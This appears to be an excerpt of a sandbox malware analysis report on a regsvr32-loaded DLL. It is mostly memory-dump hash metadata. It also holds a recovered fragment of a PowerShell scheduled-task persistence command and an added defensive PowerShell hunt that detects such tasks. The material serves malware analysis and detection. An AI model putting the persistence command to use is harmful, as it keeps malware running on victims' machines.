                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastWait
                                                                    • String ID:
                                                                    • API String ID: 1574541344-0
                                                                    • Opcode ID: be802b39141b6e89c3fe4a15301ed45f445826f3c101ad4fe0dc9e06537fb618
                                                                    • Instruction ID: 049284c6aa9b5c1b2d949aa119ba650cf77239ef0c486fd3e6cde043594010c4
                                                                    • Opcode Fuzzy Hash: be802b39141b6e89c3fe4a15301ed45f445826f3c101ad4fe0dc9e06537fb618
                                                                    • Instruction Fuzzy Hash: 0A21B432B1A5138AFB658A65D821DBD2761AB41798F14C035DE6E9B6E8CF3C9442CB40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCounterQueryRemove
                                                                    • String ID:
                                                                    • API String ID: 2370987109-0
                                                                    • Opcode ID: 3f194e0851a387f7221e734b812e9f26989468eb3d51d0d61b18c8102ab6eb93
                                                                    • Instruction ID: 9840c052b17f8ea1f0aaa08a3dd8e1c10837ae03ad29f116b3bd4ac4a81b2e17
                                                                    • Opcode Fuzzy Hash: 3f194e0851a387f7221e734b812e9f26989468eb3d51d0d61b18c8102ab6eb93
                                                                    • Instruction Fuzzy Hash: 1B21CB22F1AA4745EB50BE2594257796290DF90BE4F1C4331EABEC27E9EF28D4828300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: a80c4003dfca4faebbf20991140aa97795faae2c77e3fc64f026f07f84bba51e
                                                                    • Instruction ID: a22fcf385e61a0126a7534f13b02b130b02a59add13c2386d4ddd40a63f706c4
                                                                    • Opcode Fuzzy Hash: a80c4003dfca4faebbf20991140aa97795faae2c77e3fc64f026f07f84bba51e
                                                                    • Instruction Fuzzy Hash: 2A61D422B09BC285E7219B19A4507FA67A0FB597A4F149335EEFC467E9DF3CE0858700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$ProcessTimes
                                                                    • String ID:
                                                                    • API String ID: 3369102921-0
                                                                    • Opcode ID: 499b30c56d909fa245b807015587a909bc6e568012296101aa17a009de191db5
                                                                    • Instruction ID: abd2a09eb8022c329507bfea5af67943f6725d988b688d261b846f5d3330abe7
                                                                    • Opcode Fuzzy Hash: 499b30c56d909fa245b807015587a909bc6e568012296101aa17a009de191db5
                                                                    • Instruction Fuzzy Hash: CE31C122B09A8582E7318B15B901AAEE370FBA8794F084121EFED137A5DF3CE1848740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: 5a6f68c738c57fa078303cac470eb9da5d5a764b24dd4cbd379faab9850ccb6b
                                                                    • Instruction ID: b2008e57699397be0ba29e84959469368dc0ea977d489200e17f2b8d5d8a42b1
                                                                    • Opcode Fuzzy Hash: 5a6f68c738c57fa078303cac470eb9da5d5a764b24dd4cbd379faab9850ccb6b
                                                                    • Instruction Fuzzy Hash: 8C319622E09AC685F720AB14E4513FAA7A0FB98394F449335DAEC427DADF3CE1958740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: QueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 1804819252-0
                                                                    • Opcode ID: b372edb0a258e6b97ae2eb944439a346aae665cc869136da0d98477599e02d95
                                                                    • Instruction ID: dd3338b53383cec5a46c00ddc9824bc9f6ea76cf44e9847654ad91861a2d06f0
                                                                    • Opcode Fuzzy Hash: b372edb0a258e6b97ae2eb944439a346aae665cc869136da0d98477599e02d95
                                                                    • Instruction Fuzzy Hash: 0D71D322B0A64391EB209B11D420B7AA761BF55BD0F585636DE7E87BEDDF7CE2418300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 1915069931-0
                                                                    • Opcode ID: b125d7cbe2ed47b59a401ecfbabacdc7d9d9a2e2ac67f7f5e1e7e73b58fea5ed
                                                                    • Instruction ID: c73de8275a88f8b8fb303f6ee5285c1181fe1c00f50d74cad2b186dfabec0820
                                                                    • Opcode Fuzzy Hash: b125d7cbe2ed47b59a401ecfbabacdc7d9d9a2e2ac67f7f5e1e7e73b58fea5ed
                                                                    • Instruction Fuzzy Hash: 68914C62B0EAC284EB749B01E051BEBA361FB847C4F848431DE9D87AADDF6DD1848740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextExceptionRaiseUnwindabortmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3394368889-0
                                                                    • Opcode ID: dcf6e42176257190d2ea28c84ae0f5ad6bae0c4b1c7225c15cdac4997257e49a
                                                                    • Instruction ID: b54882c469696f24675ddd59b745b1b118321787982720528e3eeba2768a97f1
                                                                    • Opcode Fuzzy Hash: dcf6e42176257190d2ea28c84ae0f5ad6bae0c4b1c7225c15cdac4997257e49a
                                                                    • Instruction Fuzzy Hash: 3451F522709B8681FB258B15E501BA9A770FF95BC4F845121EFAC57BA9DF3CE081C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextExceptionRaiseUnwindabortmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3394368889-0
                                                                    • Opcode ID: 29c59bfd3d6a36017537bf692beed53b5e9baf39cecaae161d8e311c31c14ee0
                                                                    • Instruction ID: f0e8a5dbbff845d12131f02db3025ee8a01d8a0b493745aba0536c9290133b94
                                                                    • Opcode Fuzzy Hash: 29c59bfd3d6a36017537bf692beed53b5e9baf39cecaae161d8e311c31c14ee0
                                                                    • Instruction Fuzzy Hash: 6A51E422B19A8681FB258F19E401BE9A760FF95B84F845121EFAC577A9DF3DE0818700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID:
                                                                    • API String ID: 1475443563-0
                                                                    • Opcode ID: 484252aaa7a447837e4c2c39fcd1ac803d7f0dd6a1f956475b7de7b5046d59a3
                                                                    • Instruction ID: 573495821e32f85ae958cd8da49d34f373f053210d7fc3281904d0aaef7dbee3
                                                                    • Opcode Fuzzy Hash: 484252aaa7a447837e4c2c39fcd1ac803d7f0dd6a1f956475b7de7b5046d59a3
                                                                    • Instruction Fuzzy Hash: 1841E827B19B8281E7109B1AE41076AE360FF957D4F184232EFDDA36A9EF3CD6458700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 68da43908b9d5c6d8e58e5f0b8461580bb4fe132dd54bd1c91f095dce0a33760
                                                                    • Instruction ID: 9ac362070b51fd1769a8f16e0bc81aa7137beccd032b7c59029050f5ba19db27
                                                                    • Opcode Fuzzy Hash: 68da43908b9d5c6d8e58e5f0b8461580bb4fe132dd54bd1c91f095dce0a33760
                                                                    • Instruction Fuzzy Hash: FE314D59B0A64B12EF04DB1659106B652816B09BF0FA05B32CE7D8F7E8DE3CE1058300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleInformationModuleProcQuery$ExceptionHandlerLibraryLoadProcessSystemVectoredmemcpymemset
                                                                    • String ID: called `Result::unwrap()` on an `Err` value$ymR:
                                                                    • API String ID: 4247985971-3140955088
                                                                    • Opcode ID: 772a93542f744c3f37992e2da3216b7894e6f1b7ab3045b291bba1e61d04605e
                                                                    • Instruction ID: cb9e8912b9b5dc4bb96cdc6bd01b615428802783ae18f77dfa433c859cd6622d
                                                                    • Opcode Fuzzy Hash: 772a93542f744c3f37992e2da3216b7894e6f1b7ab3045b291bba1e61d04605e
                                                                    • Instruction Fuzzy Hash: E5327D2271AB8282E7219B15E460BAAA7A0FB85784F484135EEDD47BE9DF7DE045C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: User$EnumInfo
                                                                    • String ID:
                                                                    • API String ID: 2388768862-0
                                                                    • Opcode ID: 3039e20b0ed68ae4d2ab150ae0e976aec51ac587ed886270c5d83566efbef080
                                                                    • Instruction ID: 1365d4953a4040d3f1208b8bdcf4aebaf16190f1b5d762e922b4d2a63f6478fc
                                                                    • Opcode Fuzzy Hash: 3039e20b0ed68ae4d2ab150ae0e976aec51ac587ed886270c5d83566efbef080
                                                                    • Instruction Fuzzy Hash: CE224E26B0ABC681EB709B15E4507EAA3A0FB84B84F844135DEAD87BADDF3CD545C740
                                                                    APIs
                                                                    Strings
                                                                    • L ") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName '' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries), xrefs: 00007FFDFB206235
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$CreateEventHandleModuleObjectSingleWait
                                                                    • String ID: L ") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName '' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)
                                                                    • API String ID: 2726895772-433569715
                                                                    • Opcode ID: bf69bdb1d7f2675f84f86c4ec97c46a2f813a296ea921ac4525269e720b5fafd
                                                                    • Instruction ID: d9fc8e4b58b7b1eebe6f75096b324035a0c2519e890f451510b31aabe346b41d
                                                                    • Opcode Fuzzy Hash: bf69bdb1d7f2675f84f86c4ec97c46a2f813a296ea921ac4525269e720b5fafd
                                                                    • Instruction Fuzzy Hash: 69F1A42261DA8186DB61DB21E45046BBBA0FBC9784F548336FADD47BA9DF3CD641CB00
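The string recovered in this function is the tail of a PowerShell `Register-ScheduledTask` call: a one-shot time trigger that repeats every minute, the description 'Default', and a settings set that lets the task start and keep running on battery. The fragment begins mid-command, so the action and the real task name are not visible here. The hunt below is an added example, not code from the report or from the sample: it keys on the parts that are visible (repetition interval, description, battery settings), runs on an endpoint as an administrator with the ScheduledTasks module, and the one-minute threshold and the 'Default' description are assumptions taken from this fragment, not a signature.

```powershell
# Added hunting example, not part of the Joe Sandbox report or of the sample.
# Looks for scheduled tasks shaped like the command fragment recovered from the
# regsvr32 memory dump: a one-shot time trigger repeating every minute, the
# description 'Default', and AllowStartIfOnBatteries/DontStopIfGoingOnBatteries.
# Requires the ScheduledTasks module (Windows 8 / Server 2012 and later) and
# administrator rights to see tasks registered by other users.

function Find-RepeatingTaskLikeSample {
    param(
        # Assumption: repetition intervals at or below this are worth reviewing
        [int]$MaxRepetitionMinutes = 1,
        # Description observed in the dumped command line
        [string]$Description = 'Default'
    )

    foreach ($task in Get-ScheduledTask) {
        foreach ($trig in $task.Triggers) {
            # -Once produces a MSFT_TaskTimeTrigger; the repetition pattern lives under .Repetition
            if ($trig.CimClass.CimClassName -ne 'MSFT_TaskTimeTrigger') { continue }
            $rep = $trig.Repetition
            if (-not $rep -or [string]::IsNullOrEmpty($rep.Interval)) { continue }

            # Interval is stored as an ISO 8601 duration such as PT1M
            $interval = [System.Xml.XmlConvert]::ToTimeSpan($rep.Interval)
            if ($interval.TotalMinutes -gt $MaxRepetitionMinutes) { continue }

            # New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
            # clears these two flags in the stored settings
            $s = $task.Settings
            $batteryMatch = (-not $s.DisallowStartIfOnBatteries) -and (-not $s.StopIfGoingOnBatteries)

            [pscustomobject]@{
                TaskPath         = $task.TaskPath
                TaskName         = $task.TaskName
                Author           = $task.Author
                Description      = $task.Description
                Interval         = $rep.Interval
                DescriptionMatch = ($task.Description -eq $Description)
                BatteryMatch     = $batteryMatch
                Actions          = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
            }
        }
    }
}

# Strongest matches first: both the description and the battery settings agree with the fragment
Find-RepeatingTaskLikeSample |
    Sort-Object DescriptionMatch, BatteryMatch -Descending |
    Format-Table TaskPath, TaskName, Interval, DescriptionMatch, BatteryMatch, Actions -AutoSize
```

Treat a hit as a lead rather than a verdict: legitimate software also registers short repeating tasks, so review the Actions column for regsvr32, powershell or a user-writable path, and correlate the registration time with Security event 4698 (scheduled task created) where task auditing is enabled.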
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ControlCreateDeviceDiskFileFreeSpacememcmpmemcpy
                                                                    • String ID: OI$TI
                                                                    • API String ID: 230461707-128833160
                                                                    • Opcode ID: bf1e5939c47eb74e637d5fb777439dc4fbeb881023a076ee875a63158673ee82
                                                                    • Instruction ID: 2534f3f4c83ac8610e4b15e989efb6f2eecb260c0063de5d22a955f63cdd1d68
                                                                    • Opcode Fuzzy Hash: bf1e5939c47eb74e637d5fb777439dc4fbeb881023a076ee875a63158673ee82
                                                                    • Instruction Fuzzy Hash: 8B427222B0E6C390F7719B01E424BEE66A0FB85784F045135DAAC86AEDDF7DD084DB41
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
